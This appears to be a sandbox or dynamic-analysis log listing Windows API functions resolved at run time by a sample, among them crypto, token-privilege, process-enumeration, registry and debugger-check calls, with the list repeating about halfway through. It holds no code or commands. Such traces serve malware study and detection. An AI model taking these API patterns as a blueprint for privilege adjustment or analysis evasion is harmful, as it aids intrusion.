DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
